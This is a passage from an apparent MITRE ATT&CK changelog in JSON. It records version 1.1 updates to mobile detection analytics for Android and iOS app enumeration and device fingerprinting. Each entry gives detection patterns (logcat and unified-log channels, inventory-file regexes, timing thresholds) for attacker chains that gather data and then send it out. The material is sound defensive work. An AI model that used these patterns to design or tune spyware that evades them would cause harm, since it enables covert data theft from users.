                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from enumeration to persist/exfil (e.g., 10\\u2013120s).\"}, {\"field\": \"MinEnumCount\", \"description\": \"Minimum count of package queries or listed rows to treat as inventory (e.g., \\u226550).\"}, {\"field\": \"TargetAppWatchlist\", \"description\": \"List of sensitive app package prefixes (banking/IdP/AV/MDM) to raise severity.\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for inventory artifacts in the app container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Known-good analytics/CDN endpoints to suppress FPs.\"}, {\"field\": \"UserContext\", \"description\": \"Work Profile/Kiosk/Jamf/Intune policy context to scope benign inventory jobs.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 20:03:14.269000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an app enumerating installed packages (PackageManager queries or shell 'pm list packages') with selective checks for high-value targets (banking/identity/security apps) and near-term persistence/egress of the inventory. Chain: capability to query apps \\u2192 burst of enumeration calls or shell listing \\u2192 optional foreground target detection \\u2192 local inventory file \\u2192 small POST to remote endpoint.\", \"old_value\": \"Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"android:logcat\", \"channel\": \"Command 'pm list packages' executed by app sandbox or child proc\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\\\\\.(json|txt|db)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to135__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to135__0\"><a href=\"#difflib_chg_to135__top\">t</a></td><td class=\"diff_header\" id=\"from135_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;the&nbsp;Android&nbsp;perm</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to135__top\">t</a></td><td class=\"diff_header\" id=\"to135_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;app&nbsp;enumerating&nbsp;installed&nbsp;packages&nbsp;(P</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ission&nbsp;`android.permission.QUERY_ALL_PACKAGES`,&nbsp;and&nbsp;apply&nbsp;ex</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ackageManager&nbsp;queries&nbsp;or&nbsp;shell&nbsp;'pm&nbsp;list&nbsp;packages')&nbsp;with&nbsp;sele</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tra&nbsp;scrutiny&nbsp;to&nbsp;applications&nbsp;that&nbsp;request&nbsp;it.&nbsp;On&nbsp;iOS,&nbsp;applic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctive&nbsp;checks&nbsp;for&nbsp;high-value&nbsp;targets&nbsp;(banking/identity/securi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ation&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;usage&nbsp;of&nbsp;the&nbsp;private&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ty&nbsp;apps)&nbsp;and&nbsp;near-term&nbsp;persistence/egress&nbsp;of&nbsp;the&nbsp;inventory.&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">PI&nbsp;`LSApplicationWorkspace`&nbsp;and&nbsp;apply&nbsp;extra&nbsp;scrutiny&nbsp;to&nbsp;appl</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">Chain:&nbsp;capability&nbsp;to&nbsp;query&nbsp;apps&nbsp;\u2192&nbsp;burst&nbsp;of&nbsp;enumeration&nbsp;calls</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ications&nbsp;that&nbsp;employ&nbsp;it.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;shell&nbsp;listing&nbsp;\u2192&nbsp;optional&nbsp;foreground&nbsp;target&nbsp;detection&nbsp;\u2192&nbsp;l</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ocal&nbsp;inventory&nbsp;file&nbsp;\u2192&nbsp;small&nbsp;POST&nbsp;to&nbsp;remote&nbsp;endpoint.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--bff6f104-006e-48e5-ac3f-4633bb3abac5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 20:27:08.190000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0600#AN1647",
                            "external_id": "AN1647"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1647",
                    "description": "Defender correlates attempts to inventory installed apps via LaunchServices/URL-scheme probing or private APIs (e.g., LSApplicationWorkspace) with checks for high-value targets and quick persistence/egress. Chain: capability/attempt (URL scheme spray or LSWorkspace calls) \u2192 large scheme/app probe set \u2192 optional webview hits to brand domains \u2192 local inventory cache \u2192 small egress.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from probe burst to persist/exfil (e.g., 10\u2013120s)."
                        },
                        {
                            "field": "MinProbeCount",
                            "description": "Minimum count of scheme/app probes to treat as inventory (e.g., \u226540)."
                        },
                        {
                            "field": "TargetBundleWatchlist",
                            "description": "Bundle IDs/schemes of sensitive targets (banking/IdP/AV/MDM)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for inventory artifacts in container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Allowlist of enterprise analytics/CDN to reduce FPs."
                        },
                        {
                            "field": "JailbreakContext",
                            "description": "Flag to escalate if private APIs appear on non-managed devices."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from probe burst to persist/exfil (e.g., 10\\u2013120s).\"}, {\"field\": \"MinProbeCount\", \"description\": \"Minimum count of scheme/app probes to treat as inventory (e.g., \\u226540).\"}, {\"field\": \"TargetBundleWatchlist\", \"description\": \"Bundle IDs/schemes of sensitive targets (banking/IdP/AV/MDM).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for inventory artifacts in container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Allowlist of enterprise analytics/CDN to reduce FPs.\"}, {\"field\": \"JailbreakContext\", \"description\": \"Flag to escalate if private APIs appear on non-managed devices.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 20:27:08.190000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates attempts to inventory installed apps via LaunchServices/URL-scheme probing or private APIs (e.g., LSApplicationWorkspace) with checks for high-value targets and quick persistence/egress. Chain: capability/attempt (URL scheme spray or LSWorkspace calls) \\u2192 large scheme/app probe set \\u2192 optional webview hits to brand domains \\u2192 local inventory cache \\u2192 small egress.\", \"old_value\": \"Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Repeated canOpenURL checks across diverse schemes (\\u2265N within short window)\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\\\\\.(json|plist|db)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to196__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to196__0\"><a href=\"#difflib_chg_to196__top\">t</a></td><td class=\"diff_header\" id=\"from196_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;the&nbsp;Android&nbsp;perm</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to196__top\">t</a></td><td class=\"diff_header\" id=\"to196_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;attempts&nbsp;to&nbsp;inventory&nbsp;installed&nbsp;apps&nbsp;via</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ission&nbsp;`android.permission.QUERY_ALL_PACKAGES`,&nbsp;and&nbsp;apply&nbsp;ex</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;LaunchServices/URL-scheme&nbsp;probing&nbsp;or&nbsp;private&nbsp;APIs&nbsp;(e.g.,&nbsp;LS</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tra&nbsp;scrutiny&nbsp;to&nbsp;applications&nbsp;that&nbsp;request&nbsp;it.&nbsp;On&nbsp;iOS,&nbsp;applic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ApplicationWorkspace)&nbsp;with&nbsp;checks&nbsp;for&nbsp;high-value&nbsp;targets&nbsp;and</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ation&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;usage&nbsp;of&nbsp;the&nbsp;private&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;quick&nbsp;persistence/egress.&nbsp;Chain:&nbsp;capability/attempt&nbsp;(URL&nbsp;sc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">PI&nbsp;`LSApplicationWorkspace`&nbsp;and&nbsp;apply&nbsp;extra&nbsp;scrutiny&nbsp;to&nbsp;appl</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">heme&nbsp;spray&nbsp;or&nbsp;LSWorkspace&nbsp;calls)&nbsp;\u2192&nbsp;large&nbsp;scheme/app&nbsp;probe&nbsp;se</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ications&nbsp;that&nbsp;employ&nbsp;it.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;\u2192&nbsp;optional&nbsp;webview&nbsp;hits&nbsp;to&nbsp;brand&nbsp;domains&nbsp;\u2192&nbsp;local&nbsp;inventory</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;cache&nbsp;\u2192&nbsp;small&nbsp;egress.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--55699534-c11f-4f9b-8908-a0c7d59160fd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-23 17:40:11.076000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0601#AN1648",
                            "external_id": "AN1648"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1648",
                    "description": "Defender correlates an app process performing a burst of OS/device attribute lookups (build, hardware, SDK level, system properties) with near-term execution branching (feature gating, module load, permission workflow changes) and/or immediate outbound communications, indicating environment evaluation used to shape follow-on actions.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window for system-info collection burst \u2192 outbound transmission (e.g., 60\u2013900s)."
                        },
                        {
                            "field": "MinSystemInfoSignals",
                            "description": "Minimum number of distinct system-attribute reads/queries within window to count as \u2018broad fingerprinting\u2019 (tune to telemetry fidelity)."
                        },
                        {
                            "field": "DistinctAttributeThreshold",
                            "description": "How many distinct attribute categories (build fields, cpu, locale, patch level, network identifiers) must be observed."
                        },
                        {
                            "field": "BackgroundOnly",
                            "description": "If true, require the burst occurs while app is background to reduce noise from legitimate settings/about-device screens."
                        },
                        {
                            "field": "AllowlistedPackages",
                            "description": "Legitimate device management, diagnostics, carrier services, and enterprise security apps expected to collect device inventory."
                        },
                        {
                            "field": "NewDomainWindowSeconds",
                            "description": "Window for \u2018newly contacted domain\u2019 enrichment after fingerprinting burst."
                        },
                        {
                            "field": "SmallPostByteRange",
                            "description": "Approximate payload size range used for \u2018fingerprint submit\u2019 heuristic (environment dependent)."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window for system-info collection burst \\u2192 outbound transmission (e.g., 60\\u2013900s).\"}, {\"field\": \"MinSystemInfoSignals\", \"description\": \"Minimum number of distinct system-attribute reads/queries within window to count as \\u2018broad fingerprinting\\u2019 (tune to telemetry fidelity).\"}, {\"field\": \"DistinctAttributeThreshold\", \"description\": \"How many distinct attribute categories (build fields, cpu, locale, patch level, network identifiers) must be observed.\"}, {\"field\": \"BackgroundOnly\", \"description\": \"If true, require the burst occurs while app is background to reduce noise from legitimate settings/about-device screens.\"}, {\"field\": \"AllowlistedPackages\", \"description\": \"Legitimate device management, diagnostics, carrier services, and enterprise security apps expected to collect device inventory.\"}, {\"field\": \"NewDomainWindowSeconds\", \"description\": \"Window for \\u2018newly contacted domain\\u2019 enrichment after fingerprinting burst.\"}, {\"field\": \"SmallPostByteRange\", \"description\": \"Approximate payload size range used for \\u2018fingerprint submit\\u2019 heuristic (environment dependent).\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 17:40:11.076000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an app process performing a burst of OS/device attribute lookups (build, hardware, SDK level, system properties) with near-term execution branching (feature gating, module load, permission workflow changes) and/or immediate outbound communications, indicating environment evaluation used to shape follow-on actions.\", \"old_value\": \"System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to165__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to165__0\"><a href=\"#difflib_chg_to165__top\">t</a></td><td class=\"diff_header\" id=\"from165_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">System&nbsp;information&nbsp;discovery&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;detect,&nbsp;and</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to165__top\">t</a></td><td class=\"diff_header\" id=\"to165_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;app&nbsp;process&nbsp;performing&nbsp;a&nbsp;burst&nbsp;of&nbsp;OS/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;therefore&nbsp;enterprises&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing&nbsp;on&nbsp;dete</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">device&nbsp;attribute&nbsp;lookups&nbsp;(build,&nbsp;hardware,&nbsp;SDK&nbsp;level,&nbsp;system</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ction&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;properties)&nbsp;with&nbsp;near-term&nbsp;execution&nbsp;branching&nbsp;(feature&nbsp;gat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing,&nbsp;module&nbsp;load,&nbsp;permission&nbsp;workflow&nbsp;changes)&nbsp;and/or&nbsp;immedi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ate&nbsp;outbound&nbsp;communications,&nbsp;indicating&nbsp;environment&nbsp;evaluati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;used&nbsp;to&nbsp;shape&nbsp;follow-on&nbsp;actions.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--04e54116-5787-4bb0-9c4a-2b620a80b5dc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-23 17:42:33.331000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0601#AN1649",
                            "external_id": "AN1649"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1649",
                    "description": "Defender correlates an app querying device model and iOS version (often limited to UIDevice-visible attributes) with subsequent behavior divergence (capability gating, alternate code paths) and/or near-term outbound connections, suggesting device fingerprinting for decision-making rather than normal telemetry.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "QueryFrequencyThreshold",
                            "description": "Baseline-dependent threshold for distinguishing normal app telemetry from discovery behavior"
                        },
                        {
                            "field": "QueryToExecutionDeviationWindow",
                            "description": "Defines acceptable delay between device queries and execution changes"
                        },
                        {
                            "field": "DeviceModelBaseline",
                            "description": "Allows tuning for environments with homogeneous vs heterogeneous device fleets"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Application invokes UIDevice queries (model, systemVersion, name)\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"QueryFrequencyThreshold\", \"description\": \"Baseline-dependent threshold for distinguishing normal app telemetry from discovery behavior\"}, {\"field\": \"QueryToExecutionDeviationWindow\", \"description\": \"Defines acceptable delay between device queries and execution changes\"}, {\"field\": \"DeviceModelBaseline\", \"description\": \"Allows tuning for environments with homogeneous vs heterogeneous device fleets\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 17:42:33.331000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an app querying device model and iOS version (often limited to UIDevice-visible attributes) with subsequent behavior divergence (capability gating, alternate code paths) and/or near-term outbound connections, suggesting device fingerprinting for decision-making rather than normal telemetry.\", \"old_value\": \"System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to198__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to198__0\"><a href=\"#difflib_chg_to198__top\">t</a></td><td class=\"diff_header\" id=\"from198_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">System&nbsp;information&nbsp;discovery&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;detect,&nbsp;and</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to198__top\">t</a></td><td class=\"diff_header\" id=\"to198_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;app&nbsp;querying&nbsp;device&nbsp;model&nbsp;and&nbsp;iOS&nbsp;ver</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;therefore&nbsp;enterprises&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing&nbsp;on&nbsp;dete</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sion&nbsp;(often&nbsp;limited&nbsp;to&nbsp;UIDevice-visible&nbsp;attributes)&nbsp;with&nbsp;sub</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 